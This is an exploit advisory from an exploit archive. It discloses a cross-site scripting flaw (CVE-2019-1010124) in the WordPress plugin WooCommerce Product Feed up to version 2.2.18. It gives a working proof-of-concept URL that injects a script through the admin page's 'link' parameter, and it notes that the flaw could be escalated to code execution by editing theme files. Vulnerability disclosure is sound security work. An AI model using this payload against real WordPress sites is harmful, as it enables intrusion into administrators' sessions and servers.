WordPress WooCommerce Product Feed 2.2.18 Plugin - Cross-Site Scripting Vulnerability

# Exploit Title: WordPress Plugin WooCommerce Product Feed <= 2.2.18 - Cross-Site Scripting
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/
# Version: <= 2.2.18
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-1010124

The WordPress plugin 'WooCommerce Product Feed' does not correctly sanitize user-input,
which leads to Cross-Site Scripting in the Admin Panel.

Since it is WordPress, it's fairly easy to get RCE with this XSS, by editing the theme
files via (for example) XHR requests with included Javascript.

Proof-of-Concept:

    https://domain.tld/wp-admin/admin.php?page=woo_feed_manage_feed&link=%3E%3Cscript%3Ealert`zerodays.lol`;%3C/script%3E

#  0day.today [2019-12-04]  #